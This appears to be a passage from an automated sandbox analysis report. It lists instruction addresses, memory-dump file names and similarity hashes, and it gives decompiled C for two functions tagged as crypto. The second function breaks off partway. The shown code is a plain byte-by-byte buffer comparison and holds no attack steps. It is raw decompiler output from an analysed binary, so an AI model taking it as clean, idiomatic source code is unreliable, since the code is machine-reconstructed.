0x00415988
0x004162bd
0x004162bd
0x00000000
0x004162bd
0x00000000
0x00415988
0x00415975
0x0041597c
0x00000000
0x00000000
0x00000000
0x0041597c
0x00415967
0x0041596a
0x00000000
0x00000000
0x00000000
0x0041598e
0x00415994
0x0041599b
0x004159a1
0x004159d8
0x004159da
0x004159df
0x004159e5
0x004159ea
0x004159ee
0x00415a19
0x00415a1a
0x00415a21
0x00415a24
0x00415a3c
0x00415a3f
0x00415a49
0x00415a4b
0x00415a51
0x00415a58
0x00415a5d
0x00415a61
0x00415a64
0x00415a66
0x00415a66
0x00415a66
0x00415a68
0x00415a70
0x00415a75
0x00415a77
0x00415a8d
0x00415a92
0x00415eac
0x00415eae
0x00415edc
0x00415ee1
0x00416086
0x00416086
0x0041608b
0x00416091
0x00416094
0x004160a3
0x004160a8
0x004160ab
0x004160b0
0x004160b6
0x004160bb
0x004160c2
0x004160ed
0x004160ee
0x004160f5
0x004160f8
0x00416113
0x00416116
0x00416120
0x00416122
0x00416128
0x00416132
0x00416137
0x0041613e
0x00416144
0x00416146
0x00416146
0x00416146
0x00416148
0x00416150
0x00416150
0x00416153
0x00416165
0x0041616b
0x0041616f
0x00416170
0x00416173
0x00416175
0x00416179
0x00416180
0x00416186
0x0041618c
0x00416194
0x00416196
0x00416196
0x00416199
0x0041619c
0x0041619c
0x00416155
0x00416155
0x00416158
0x00416158
0x004161a2
0x004161ab
0x004161b1
0x004161b4
0x004161b7
0x004161ba
0x004161bc
0x0041627b
0x0041627b
0x004161c2
0x004161c2
0x004161c5
0x00000000
0x00000000
0x004161cb
0x004161d3
0x004161d6
0x004161db
0x004161e1
0x004161e4
0x004161e7
0x00416243
0x00416246
0x00415fbc
0x00415fbc
0x00415fc0
0x00000000
0x00415949
0x00415949
0x00415949
0x00415949
0x00415949
0x00415949
0x00415949
0x00415949
0x00415949
0x00415949
0x00415949
0x00415949
0x00415949
0x00415949
0x00415949
0x00415949
0x00415949
0x0041594f
0x00415952
0x00415954
0x00415957
0x00000000
0x00000000
0x00000000
0x00415957
0x00415ddc
0x00415ddc
0x00415ddc
0x00000000
0x00415949
0x00000000
0x00415de6
0x00415de6
0x00415def
0x00415df2
0x00415df2
0x00000000
0x00415949
0x00000000
0x00415dfa
0x00415dfa
0x00415e04
0x00415e04
0x00000000
0x00415fda
0x00415fda
0x00415fe4
0x00415fe4
0x00000000
0x00415e0d
0x00415e0d
0x00415e17
0x00415e17
0x00000000
0x00415fed
0x00415fed
0x00415ff7
0x00415ff7
0x00000000
0x00415e20
0x00415e20
0x00415e2a
0x00415e2a
0x00000000
0x00416000
0x00416000
0x0041600a
0x0041600a
0x00000000
0x00415e33
0x00415e33
0x00415e3d
0x00415e3d
0x00000000
0x00416013
0x00416013
0x0041601d
0x0041601d
0x00000000
0x00415e46
0x00415e46
0x00415e50
0x00415e50
0x00415e59
0x00415e5c
0x00415e5f
0x00415e62
0x00415949
0x00415949
0x00415949
0x00415949
0x0041594f
0x00415952
0x00415954
0x00415957
0x00000000
0x00000000
0x00000000
0x00415957
0x00415e67
0x00415e67
0x00415e67
0x00415e71
0x00415e77
0x00415e7d
0x00415e88
0x00415e91
0x00415e97
0x00415e9b
0x00415e9f
0x00415ea2
0x00415ea2
0x00415ea7
0x00415949
0x00415949
0x00415949
0x00415949
0x0041594f
0x00415952
0x00415954
0x00415957
0x00000000
0x00000000
0x00000000
0x00415957
0x00000000
0x00415949
0x00416283
0x00416289
0x00416292
0x0041629d
0x004162a0
0x004162a6
0x004162af
0x004162b3
0x004162b3
0x004162b8
0x00415949
0x00415949
0x00415949
0x00415949
0x00415949
0x00415949
0x0041594f
0x00415952
0x00415954
0x00415957
0x00000000
0x00000000
0x00000000
0x00415957
0x00000000
0x00415949
0x00415ef2
0x00415ef8
0x00415efd
0x00415f05
0x00415f0b
0x00415f0e
0x00415f10
0x00000000
0x00000000
0x00415f16
0x00415f18
0x00000000
0x00000000
0x00415f1e
0x00415f26
0x00415f29
0x00415f2c
0x00415f30
0x00415f33
0x00415f36
0x00415f39
0x00415f90
0x00415f93
0x00000000
0x00000000
0x00415f95
0x00415f95
0x00415f98
0x00415f9b
0x00415fa3
0x00415fa8
0x00415fac
0x00415fb0
0x00415fb4
0x00415fb7
0x00415fb7
0x00415fb7
0x00415fb7
0x00000000
0x00415f9b
0x00415f3b
0x00415f3e
0x00000000
0x00000000
0x00415f40
0x00415f40
0x00415f43
0x00415f46
0x00415f49
0x00415f4b
0x00415f4d
0x00415f51
0x00415f56
0x00415f5c
0x00415f62
0x00415f68
0x00415f6e
0x00415f74
0x00415f7a
0x00415f7d
0x00415f80
0x00415f83
0x00415f83
0x00415f83
0x00415f83
0x00415f88
0x00415f88
0x00415f8b
0x00000000
0x00415ec0
0x00415ec6
0x00415ecb
0x00415ecb
0x00000000
0x00416041
0x00416041
0x00416041
0x0041604b
0x00416051
0x00416057
0x00416062
0x0041606b
0x00416071
0x00416075
0x00416079
0x0041607c
0x0041607c
0x00000000
0x00416026
0x00416026
0x00416030
0x00416030
0x00416039
0x00000000
0x00416039
0x00415fc6
0x00415fc6
0x00415fcf
0x00415fd2
0x00415fd2
0x0041624f
0x0041624f
0x00416252
0x00416255
0x0041625d
0x00416262
0x00416266
0x0041626a
0x0041626e
0x00416271
0x00416271
0x00416271
0x00416271
0x00000000
0x00416276
0x004161e9
0x004161ec
0x00000000
0x00000000
0x004161f5
0x004161f8
0x004161f8
0x004161fb
0x004161fe
0x00416201
0x00416203
0x00416207
0x0041620c
0x00416212
0x00416218
0x0041621e
0x00416224
0x0041622a
0x00416230
0x00416233
0x00416236
0x00416239
0x00416239
0x00416239
0x00416239
0x00000000
0x0041623e
0x004161bc
0x004160fa
0x00416101
0x00416101
0x00416103
0x00000000
0x00000000
0x00416105
0x00416106
0x00416109
0x0041610c
0x00000000
0x00000000
0x00000000
0x0041610e
0x00416110
0x00000000
0x00416110
0x004160c6
0x004160c9
0x004160d3
0x004160db
0x004160e0
0x004160e3
0x00000000
0x00000000
0x00000000
0x00000000
0x00416096
0x00416096
0x00416099
0x0041609b
0x0041609c
0x0041609f
0x0041609f
0x00000000
0x00416096
0x00415ee7
0x00415ee7
0x00415eea
0x00415eea
0x00415eb3
0x00415eb7
0x00415ebc
0x00415ebe
0x00000000
0x00000000
0x00000000
0x00415ebe
0x00415a98
0x00415a9d
0x00415aa0
0x00415ab2
0x00415ab8
0x00415abd
0x00415ac0
0x00415ac2
0x00415ac6
0x00415acd
0x00415ad3
0x00415ad9
0x00415ae1
0x00415ae3
0x00415ae3
0x00415ae6
0x00415ae6
0x00415aa2
0x00415aa5
0x00415aa5
0x00415aee
0x00415af1
0x00415af6
0x00415afc
0x00415b01
0x00415b08
0x00415b33
0x00415b34
0x00415b3b
0x00415b3e
0x00415b59
0x00415b5c
0x00415b66
0x00415b68
0x00415b6e
0x00415b78
0x00415b7d
0x00415b84
0x00415b8a
0x00415b8c
0x00415b8c
0x00415b8c
0x00415b8e
0x00000000
0x00415b8e
0x00415b40
0x00415b47
0x00415b47
0x00415b49
0x00000000
0x00000000
0x00415b4b
0x00415b4c
0x00415b4f
0x00415b52
0x00000000
0x00000000
0x00000000
0x00415b54
0x00415b56
0x00000000
0x00415b0a
0x00415b0c
0x00415b0f
0x00415b19
0x00415b21
0x00415b26
0x00415b29
0x00415b96
0x00415b96
0x00415b99
0x00415bab
0x00415bb1
0x00415bb5
0x00415bb8
0x00415bba
0x00415cc9
0x00415cc9
0x00415ccc
0x00415cd2
0x00415cd8
0x00415cdb
0x00415ce1
0x00415ce3
0x00415ce6
0x00415cec
0x00415cee
0x00415cee
0x00415cee
0x00415cee
0x00415cec
0x00415ce1
0x00415cf4
0x00415cfa
0x00415d00
0x00415d03
0x00415d06
0x00415d09
0x00415d0c
0x00415d11
0x00415d13
0x00415d1c
0x00415d22
0x00415d25
0x00415d27
0x00000000
0x00415d2d
0x00415d2d
0x00415d2f
0x00000000
0x00000000
0x00415d35
0x00415d3d
0x00415d40
0x00415d43
0x00415d47
0x00415d4a
0x00415d4d
0x00415d50
0x00415dad
0x00415db0
0x00000000
0x00000000
0x00415db5
0x00415db5
0x00415db8
0x00415dbb
0x00415dc3
0x00415dc8
0x00415dcc
0x00415dd0
0x00415dd4
0x00415dd7
0x00415dd7
0x00415dd7
0x00415dd7
0x00000000
0x00415dbb
0x00415d52
0x00415d55
0x00000000
0x00000000
0x00415d5d
0x00415d5d
0x00415d60
0x00415d63
0x00415d66
0x00415d68
0x00415d6a
0x00415d6e
0x00415d73
0x00415d79
0x00415d7f
0x00415d85
0x00415d8b
0x00415d91
0x00415d97
0x00415d9a
0x00415d9d
0x00415da0
0x00415da0
0x00415da0
0x00415da0
0x00415da5
0x00415da8
0x00000000
0x00415da8
0x00415d27
0x00415bc0
0x00415bc3
0x00415ca6
0x00415cad
0x00415cb3
0x00415cb9
0x00415cc1
0x00415cc3
0x00415cc3
0x00415cc6
0x00000000
0x00415cc6
0x00415bc9
0x00415bcd
0x00415bd4
0x00415bd9
0x00415be1
0x00415bea
0x00415bf0
0x00415bf2
0x00415bf2
0x00415bf5
0x00415bf5
0x00415bfa
0x00415bff
0x00415c05
0x00415c0a
0x00415c11
0x00415c3c
0x00415c3d
0x00415c44
0x00415c47
0x00415c62
0x00415c65
0x00415c6f
0x00415c71
0x00415c77
0x00415c81
0x00415c86
0x00415c8d
0x00415c93
0x00415c95
0x00415c95
0x00415c95
0x00415c97
0x00000000
0x00415c97
0x00415c49
0x00415c50
0x00415c50
0x00415c52
0x00000000
0x00000000
0x00415c54
0x00415c55
0x00415c58
0x00415c5b
0x00000000
0x00000000
0x00000000
0x00415c5d
0x00415c5f
0x00000000
0x00415c13
0x00415c15
0x00415c18
0x00415c22
0x00415c2a
0x00415c2f
0x00415c32
0x00415c9f
0x00415c9f
0x00000000
0x00415c9f
0x00415c11
0x00415b9c
0x00000000
0x00415b9c
0x00415b08
0x00415a82
0x00415a85
0x00000000
0x00415a85
0x00415a26
0x00415a2a
0x00415a2a
0x00415a2c
0x00000000
0x00000000
0x00415a2e
0x00415a2f
0x00415a32
0x00415a35
0x00000000
0x00000000
0x00000000
0x00415a37
0x00415a39
0x00000000
0x00415a39
0x004159f2
0x004159f5
0x004159ff
0x00415a07
0x00415a0c
0x00415a0f
0x00000000
0x00415a0f
0x004159a3
0x004159a9
0x00000000
0x00000000
0x004159ad
0x004159b8
0x004159be
0x00000000
0x00000000
0x004159c4
0x00000000
0x00000000
0x004159cc
0x004159d2
0x00000000
0x00000000
0x00000000
0x004159d2
0x0041591b
0x0041591b
0x00415922
0x00415922
0x00415ed5
0x00000000
0x00415ed5
0x004158e6
0x004158f2
0x004158f6
0x004158fd
0x00000000
0x004158ff
0x004158ff
0x00000000
0x004158ff
0x004158fd

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f37391ef1053c1bbf07d2695c094116b503d0edd865e66e71afc9767a94a062c
Instruction ID: adb0c68939456ce3b4be1b159b220c94274f13791c988db2f06f8098c49277ce
Opcode Fuzzy Hash: f37391ef1053c1bbf07d2695c094116b503d0edd865e66e71afc9767a94a062c
Instruction Fuzzy Hash: 5472C170A04645DFCB19CF64C1906EDBBB1FF95308F2881AED8598B742D339E981CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041B5C9, Relevance: .4, Instructions: 384
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0041B5C9(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t210;
				signed char _t211;
				signed int _t216;
				signed int _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t344;
				void* _t346;
				void* _t348;
				void* _t351;
				void* _t353;
				void* _t355;
				void* _t358;
				void* _t360;
				void* _t362;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t316 = 0;
					L17:
					if(_t316 != 0) {
						goto L1;
					}
					_t206 =  *(_t196 - 0x1b);
					if(_t206 ==  *(_t200 - 0x1b)) {
						_t316 = 0;
						L28:
						if(_t316 != 0) {
							goto L1;
						}
						_t207 =  *(_t196 - 0x17);
						if(_t207 ==  *(_t200 - 0x17)) {
							_t316 = 0;
							L39:
							if(_t316 != 0) {
								goto L1;
							}
							_t208 =  *(_t196 - 0x13);
							if(_t208 ==  *(_t200 - 0x13)) {
								_t316 = 0;
								L50:
								if(_t316 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t316 = 0;
									L61:
									if(_t316 != 0) {
										goto L1;
									}
									_t210 =  *(_t196 - 0xb);
									if(_t210 ==  *(_t200 - 0xb)) {
										_t316 = 0;
										L72:
										if(_t316 != 0) {
											goto L1;
										}
										_t211 =  *(_t196 - 7);
										if(_t211 ==  *(_t200 - 7)) {
											_t316 = 0;
											L83:
											if(_t316 != 0) {
												goto L1;
											}
											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t319 == 0) {
												L5:
												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t321 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
													}
													L2:
													return _t197;
												}
												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
												if(_t216 != 0) {
													L86:
													_t197 = _t216;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
											if(_t216 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t323 == 0) {
											L76:
											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t325 == 0) {
												L78:
												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t327 == 0) {
													L80:
													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t316 != 0) {
														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
													}
													goto L83;
												}
												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
												if(_t316 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t330 == 0) {
										L65:
										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t332 == 0) {
											L67:
											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t334 == 0) {
												L69:
												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t316 != 0) {
													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
												}
												goto L72;
											}
											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t337 == 0) {
									L54:
									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t339 == 0) {
										L56:
										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t341 == 0) {
											L58:
											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t316 != 0) {
												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											}
											goto L61;
										}
										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t344 == 0) {
								L43:
								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t346 == 0) {
									L45:
									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t348 == 0) {
										L47:
										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t316 != 0) {
											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
										}
										goto L50;
									}
									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t351 == 0) {
							L32:
							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t353 == 0) {
								L34:
								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t355 == 0) {
									L36:
									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t316 != 0) {
										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
									}
									goto L39;
								}
								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t358 == 0) {
						L21:
						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t360 == 0) {
							L23:
							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t362 == 0) {
								L25:
								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t316 != 0) {
									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
								}
								goto L28;
							}
							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
					if(_t316 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L17;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L14;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L12;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t316;
				goto L2;
			}

0x0041b5c9
0x0041b5c9
0x0041b5cf
0x0041b64f
0x0041b651
0x0041b653
0x00000000
0x00000000
0x0041b659
0x0041b65f
0x0041b6de
0x0041b6e0
0x0041b6e2
0x00000000
0x00000000
0x0041b6e8
0x0041b6ee
0x0041b76d
0x0041b76f
0x0041b771
0x00000000
0x00000000
0x0041b777
0x0041b77d
0x0041b7fc
0x0041b7fe
0x0041b800
0x00000000
0x00000000
0x0041b80c
0x0041b88c
0x0041b88e
0x0041b890
0x00000000
0x00000000
0x0041b896
0x0041b89c
0x0041b91b
0x0041b91d
0x0041b91f
0x00000000
0x00000000
0x0041b925
0x0041b92b
0x0041b9aa
0x0041b9ac
0x0041b9ae
0x00000000
0x00000000
0x0041b9bc
0x0041b9be
0x0041b5a1
0x0041b5a9
0x0041b5ab
0x0041b187
0x0041b18f
0x0041b191
0x0041b1a2
0x0041b1a2
0x0041ad97
0x0041baf3
0x0041baf3
0x0041b5b8
0x0041b5be
0x0041b9d7
0x0041b9d7
0x00000000
0x0041b5c4
0x00000000
0x0041b5c4
0x0041b5be
0x0041b9cb
0x0041b9d1
0x00000000
0x00000000
0x00000000
0x0041b9d1
0x0041b934
0x0041b936
0x0041b94d
0x0041b955
0x0041b957
0x0041b96e
0x0041b976
0x0041b978
0x0041b98f
0x0041b997
0x0041b999
0x0041b9a6
0x0041b9a6
0x00000000
0x0041b999
0x0041b985
0x0041b989
0x00000000
0x00000000
0x00000000
0x0041b989
0x0041b964
0x0041b968
0x00000000
0x00000000
0x00000000
0x0041b968
0x0041b943
0x0041b947
0x00000000
0x00000000
0x00000000
0x0041b947
0x0041b8a5
0x0041b8a7
0x0041b8be
0x0041b8c6
0x0041b8c8
0x0041b8df
0x0041b8e7
0x0041b8e9
0x0041b900
0x0041b908
0x0041b90a
0x0041b917
0x0041b917
0x00000000
0x0041b90a
0x0041b8f6
0x0041b8fa
0x00000000
0x00000000
0x00000000
0x0041b8fa
0x0041b8d5
0x0041b8d9
0x00000000
0x00000000
0x00000000
0x0041b8d9
0x0041b8b4
0x0041b8b8
0x00000000
0x00000000
0x00000000
0x0041b8b8
0x0041b816
0x0041b818
0x0041b82f
0x0041b837
0x0041b839
0x0041b850
0x0041b858
0x0041b85a
0x0041b871
0x0041b879
0x0041b87b
0x0041b888
0x0041b888
0x00000000
0x0041b87b
0x0041b867
0x0041b86b
0x00000000
0x00000000
0x00000000
0x0041b86b
0x0041b846
0x0041b84a
0x00000000
0x00000000
0x00000000
0x0041b84a
0x0041b825
0x0041b829
0x00000000
0x00000000
0x00000000
0x0041b829
0x0041b786
0x0041b788
0x0041b79f
0x0041b7a7
0x0041b7a9
0x0041b7c0
0x0041b7c8
0x0041b7ca
0x0041b7e1
0x0041b7e9
0x0041b7eb
0x0041b7f8
0x0041b7f8
0x00000000
0x0041b7eb
0x0041b7d7
0x0041b7db
0x00000000
0x00000000
0x00000000
0x0041b7db
0x0041b7b6
0x0041b7ba
0x00000000
0x00000000
0x00000000
0x0041b7ba
0x0041b795
0x0041b799
0x00000000
0x00000000
0x00000000
0x0041b799
0x0041b6f7
0x0041b6f9
0x0041b710
0x0041b718
0x0041b71a
0x0041b731
0x0041b739
0x0041b73b
0x0041b752
0x0041b75a
0x0041b75c
0x0041b769
0x0041b769
0x00000000
0x0041b75c
0x0041b748
0x0041b74c
0x00000000
0x00000000
0x00000000
0x0041b74c
0x0041b727
0x0041b72b
0x00000000
0x00000000
0x00000000
0x0041b72b
0x0041b706
0x0041b70a
0x00000000
0x00000000
0x00000000
0x0041b70a
0x0041b668
0x0041b66a
0x0041b681
0x0041b689
0x0041b68b
0x0041b6a2
0x0041b6aa
0x0041b6ac
0x0041b6c3
0x0041b6cb
0x0041b6cd
0x0041b6da
0x0041b6da
0x00000000
0x0041b6cd
0x0041b6b9
0x0041b6bd
0x00000000
0x00000000
0x00000000
0x0041b6bd
0x0041b698
0x0041b69c
0x00000000
0x00000000
0x00000000
0x0041b69c
0x0041b677
0x0041b67b
0x00000000
0x00000000
0x00000000
0x0041b5d1
0x0041b5d1
0x0041b5d5
0x0041b5d9
0x0041b5db
0x0041b5f2
0x0041b5f2
0x0041b5f6
0x0041b5fa
0x0041b5fc
0x0041b613
0x0041b613
0x0041b617
0x0041b61b
0x0041b61d
0x0041b634
0x0041b634
0x0041b638
0x0041b63c
0x0041b63e
0x0041b644
0x0041b647
0x0041b64b
0x0041b64b
0x00000000
0x0041b63e
0x0041b623
0x0041b626
0x0041b62a
0x0041b62e
0x00000000
0x00000000
0x00000000
0x0041b62e
0x0041b602
0x0041b605
0x0041b609
0x0041b60d
0x00000000
0x00000000
0x00000000
0x0041b60d
0x0041b5e1
0x0041b5e4
0x0041b5e8
0x0041b5ec
0x00000000
0x00000000
0x00000000
0x0041b5ec
0x0041a9c2
0x0041a9c2
0x00000000

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: 089f7d2cec4d3b6b007ba227a0ec61527a8ec2e556ace6c5bdefce34f61720a3
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 7CD180B3D1B9B3068735812D406817BEE62AFD1B5131FC7E2CCD42F38D922A5D9195D4

Uniqueness

Uniqueness Score: -1.00%

Function 0041B1A9, Relevance: .4, Instructions: 378
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0041B1A9(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t204;
				signed char _t206;
				signed int _t211;
				signed int _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t342;
				void* _t344;
				void* _t346;
				void* _t349;
				void* _t351;
				void* _t353;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t309 = 0;
					L15:
					if(_t309 != 0) {
						goto L1;
					}
					_t201 =  *(_t191 - 0x1a);
